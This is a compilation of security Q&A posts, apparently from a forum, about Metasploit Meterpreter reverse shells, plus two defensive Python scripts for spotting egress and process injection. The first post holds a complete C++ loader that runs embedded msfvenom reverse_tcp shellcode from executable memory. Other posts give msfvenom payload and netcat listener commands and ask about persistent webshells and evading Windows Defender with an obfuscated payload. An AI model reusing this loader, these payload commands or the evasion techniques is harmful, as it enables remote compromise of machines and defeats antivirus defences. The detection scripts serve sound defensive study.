Can’t inject Meterpreter shellcode in C++ code

I want to inject Meterpreter shellcode into a C++ program.

When I create a .exe file with msfvenom and try it in my virtual machine (Windows 7) it works well, but when I create shellcode and inject it into a C++ file, the program compiles successfully but crashes when I launch it in my VM.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f c -o main2.txt 

Here is my C++ code (compiled in x64 Debug mode with Microsoft Visual Studio):

#include <iostream>
#include <cstring>      // memcpy
#include <Windows.h>

int main() {
    // msfvenom output (windows/x64/meterpreter/reverse_tcp, -f c)
    char shell[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
        "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
        "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
        "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
        "\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
        "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
        "\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
        "\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
        "\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
        "\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
        "\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
        "\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
        "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
        "\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
        "\x49\xbc\x02\x00\x11\x5c\xc0\xa8\xd0\x85\x41\x54\x49\x89\xe4"
        "\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
        "\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
        "\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
        "\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
        "\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
        "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
        "\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
        "\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5"
        "\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41"
        "\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41"
        "\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
        "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8"
        "\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40"
        "\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5"
        "\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
        "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
        "\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";

    // allocate an RWX buffer, copy the bytes in and jump to them
    void* exec = VirtualAlloc(0, sizeof shell, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shell, sizeof shell);
    ((void(*)())exec)();

    return 0;
}

Here is the error:

The application was unable to start correctly: c000007b

What is my mistake? Thanks for any answers!

MSF Venom Reverse TCP-Shell: Meterpreter and Netcat Listeners not responsive

I have created an MSFVenom TCP reverse shell payload that is executed on a Windows machine:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4443 -f exe -o shell.exe 

In addition I am running a listener with Metasploit’s "multi/handler" or alternatively, a netcat listener:

nc -lvp 4443 

However, after executing the payload on the target machine, I cannot get a working shell, neither on Meterpreter nor on Netcat.

Meterpreter does not respond to any command, or backgrounding. I cannot get the normal Meterpreter Shell.

Netcat Listener

There is also no shell appearing on Netcat.

Any help or suggestions are very appreciated!

UFW does not block meterpreter

I am doing some pen testing on my WordPress server. I wanted to see what would happen if an attacker were to get hold of my username and password for WordPress.

So I used the standard exploit in msfconsole, wp_admin_shell_upload, and set the password and username.

What I do not understand is why my UFW does not block the established connection. (My rules are set to block everything apart from ports 21, 80 and 22.)

But I can see a connection established on port 48846. Why is this not blocked, and why am I able to send commands to the remote machine via Meterpreter and receive data?

Screenshots below (images not reproduced here):

Client: (screenshot)

Attacker: (screenshot)
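The point this question turns on is direction: UFW's default policy is "deny incoming, allow outgoing", so rules written for inbound ports 21, 80 and 22 never see a connection that the web server itself opens toward the attacker's listener. As an added example (not part of the question), the Python script below parses output in the layout of `ss -tnp`, decides which established connections the host initiated (the side holding an ephemeral local port is the side that called connect()), and flags any that go to a peer port outside an egress allowlist. The sample lines, the allowlist and the process names are constructed for the example; the ephemeral range is the Linux default for net.ipv4.ip_local_port_range.

```python
"""Flag host-initiated TCP connections that an inbound-only firewall policy never sees."""
import re
from dataclasses import dataclass

# Ports this web server is expected to reach outbound (assumption for the example)
EGRESS_ALLOW = {53, 80, 443}
# Linux default ephemeral source-port range (net.ipv4.ip_local_port_range)
EPHEMERAL = range(32768, 60999 + 1)

# Constructed sample in the column layout of `ss -tnp`
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
ESTAB  0      0      10.0.0.5:80          203.0.113.7:51234   users:(("apache2",pid=1204,fd=12))
ESTAB  0      0      10.0.0.5:44022       198.51.100.9:443    users:(("php-fpm7.4",pid=1300,fd=8))
ESTAB  0      0      10.0.0.5:48846       192.0.2.10:4444     users:(("php-fpm7.4",pid=1311,fd=9))
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*           users:(("sshd",pid=700,fd=3))
"""

@dataclass
class Conn:
    state: str
    local_ip: str
    local_port: int
    peer_ip: str
    peer_port: int      # 0 when the peer is a wildcard (listening sockets)
    process: str
    pid: int

LINE_RE = re.compile(r"^(\S+)\s+\d+\s+\d+\s+(\S+):(\d+)\s+(\S+):(\S+)\s*(.*)$")
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+)')

def parse_ss(text):
    """Turn `ss -tnp` style lines into Conn records; the header line does not match and is skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        state, lip, lport, pip, pport, proc = m.groups()
        pm = PROC_RE.search(proc)
        name, pid = (pm.group(1), int(pm.group(2))) if pm else ("?", 0)
        conns.append(Conn(state, lip, int(lport), pip,
                          int(pport) if pport.isdigit() else 0, name, pid))
    return conns

def is_outbound(c):
    """The endpoint that picked an ephemeral local port is the one that initiated the connection."""
    return c.state == "ESTAB" and c.local_port in EPHEMERAL

def suspicious_egress(conns):
    """Host-initiated connections to peer ports the server has no business talking to."""
    return [c for c in conns if is_outbound(c) and c.peer_port not in EGRESS_ALLOW]

if __name__ == "__main__":
    for c in suspicious_egress(parse_ss(SAMPLE_SS_OUTPUT)):
        print(f"OUTBOUND {c.local_ip}:{c.local_port} -> {c.peer_ip}:{c.peer_port} "
              f"by {c.process} (pid {c.pid})")
```

On the sample the web-server worker holding local port 48846 and talking to a peer on 4444 is the only hit; the inbound Apache connection on port 80 and the outbound HTTPS fetch are both expected. To make UFW actually block this class of traffic the outbound default has to change as well, e.g. `ufw default deny outgoing` followed by explicit `ufw allow out 53` and `ufw allow out 443/tcp` rules for what the server legitimately needs.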

Meterpreter Session died [Bwapp]

I just set up a lab with bWAPP and wanted to jump straight into a webshell. I used the Unrestricted File Upload vuln -> uploaded my perfect shell created with msfvenom.

My only problem is that my session doesn’t seem persistent as I’m getting Meterpreter session opened and then died.

For more context, bWAPP is on a bridged network in VBox and my Kali is also bridged.

php/meterpreter_reverse_tcp etc etc.

Any ideas…

I need persistence (RCE)

What allows meterpreter to migrate processes and how to defend against it?

I mainly use Linux so I’m not well-versed on how Windows and its privileges work. I’ve recently learned to use Metasploit and meterpreter on Windows boxes.

Previous research

This answer has given an overview of how meterpreter migrates on Windows.
This article has addressed process migration on Linux

My questions

  1. What allows process migration to work?
  2. What are the main differences between Windows and Linux in process migration?
  3. Is this migration a feature or a vulnerability?
  4. How can I defend against it?
  5. Should I try to prevent process migration?
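On the defensive side of these questions, the operation a migration depends on is one process starting a thread inside another, and Sysmon records exactly that as Event ID 8 (CreateRemoteThread), with the source and target images and where the new thread starts. As an added example (not part of the original question), the Python script below parses such records in Sysmon's XML layout and ranks them with three well-known indicators: a thread starting in memory that belongs to no loaded module, a thread starting at LoadLibrary (the DLL-injection pattern), and a source binary running from a user-writable path. The events are constructed for the example, and the allowlist of processes that legitimately create remote threads is an assumption to tune per environment.

```python
"""Triage Sysmon Event ID 8 (CreateRemoteThread) records for signs of process injection."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Sources that create remote threads as part of normal operation (assumption, tune per host)
KNOWN_INJECTORS = {r"c:\windows\system32\csrss.exe"}

@dataclass
class RemoteThread:
    source_image: str
    source_pid: int
    target_image: str
    target_pid: int
    start_address: str
    start_module: str       # "" when the start address is not inside a loaded module
    start_function: str

def _clean(value):
    """Sysmon writes '-' for fields it could not resolve; treat that as empty."""
    return "" if value in ("", "-") else value

def parse_event(xml_text):
    """Return a RemoteThread for an Event ID 8 record, or None for any other event."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "8":
        return None
    data = {d.get("Name"): (d.text or "").strip() for d in root.find("e:EventData", NS)}
    return RemoteThread(
        data["SourceImage"], int(data["SourceProcessId"]),
        data["TargetImage"], int(data["TargetProcessId"]),
        data["StartAddress"], _clean(data["StartModule"]), _clean(data["StartFunction"]),
    )

def triage(ev):
    """Reasons the event deserves analyst attention; an empty list means benign by policy."""
    if ev.source_image.lower() in KNOWN_INJECTORS:
        return []
    reasons = []
    if not ev.start_module:
        reasons.append("thread starts in memory not backed by a loaded module")
    if ev.start_function.lower().startswith("loadlibrary"):
        reasons.append("thread starts at LoadLibrary (DLL injection pattern)")
    if ev.source_image.lower().startswith("c:\\users\\"):
        reasons.append("source process runs from a user-writable path")
    if not reasons:
        reasons.append("cross-process thread from a source not on the allowlist")
    return reasons

def make_event(src, spid, dst, dpid, addr, module="-", func="-"):
    """Build a constructed Event ID 8 record in Sysmon's XML layout (example data only)."""
    return f"""<Event xmlns="{NS['e']}"><System><EventID>8</EventID></System><EventData>
  <Data Name="SourceProcessId">{spid}</Data><Data Name="SourceImage">{src}</Data>
  <Data Name="TargetProcessId">{dpid}</Data><Data Name="TargetImage">{dst}</Data>
  <Data Name="StartAddress">{addr}</Data><Data Name="StartModule">{module}</Data>
  <Data Name="StartFunction">{func}</Data></EventData></Event>"""

# Constructed sample events: one allowlisted system process, one unknown binary from a
# user's Downloads folder starting an unbacked thread in explorer, one LoadLibrary injection.
SAMPLE_EVENTS = [
    make_event(r"C:\Windows\System32\csrss.exe", 612,
               r"C:\Program Files\Google\Chrome\Application\chrome.exe", 5012,
               "0x00007FFC1A2B3C40", r"C:\Windows\System32\ntdll.dll", "RtlUserThreadStart"),
    make_event(r"C:\Users\bob\Downloads\update.exe", 4120,
               r"C:\Windows\explorer.exe", 2340, "0x00000214A1B20000"),
    make_event(r"C:\Program Files\Vendor\agent.exe", 988,
               r"C:\Windows\System32\notepad.exe", 3300,
               "0x00007FFC1B0D0E70", r"C:\Windows\System32\KERNEL32.DLL", "LoadLibraryW"),
]

def report(xml_events):
    """(source image, target image, reasons) for every record that triage did not clear."""
    out = []
    for ev in filter(None, (parse_event(x) for x in xml_events)):
        reasons = triage(ev)
        if reasons:
            out.append((ev.source_image, ev.target_image, reasons))
    return out

if __name__ == "__main__":
    for src, dst, reasons in report(SAMPLE_EVENTS):
        print(f"{src} -> {dst}: " + "; ".join(reasons))
```

Collecting Event ID 8 requires a Sysmon configuration whose CreateRemoteThread rule is not excluding everything; once the events flow, the same three indicators map directly onto a SIEM rule. On the hardening side, a migration into a process owned by another user or running at a higher integrity level needs a handle with thread-creation rights, which is why limiting who holds SeDebugPrivilege and not running day-to-day workloads as local administrator reduces what a session can migrate into.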

FUD payload connection over 443 (meterpreter behavior) still being detected by Windows Defender

I’ve managed to create an obfuscated shellcode that is compatible with the windows/meterpreter/reverse_tcp and windows/shell/reverse_tcp (Metasploit) payloads' handlers. When testing with Metasploit listening with the windows/shell/reverse_tcp payload the connection is not detected; when I test with Metasploit listening with windows/meterpreter/reverse_tcp set, the behavior is detected. The detection seems to be post-connection.

Are there additional options/variables I can set in the windows/meterpreter/reverse_tcp payload handler to evade antivirus (Windows Defender) detecting Meterpreter behavior?

I’m looking to evade detection server-side (Metasploit listener options), not client-side; I’ve done that.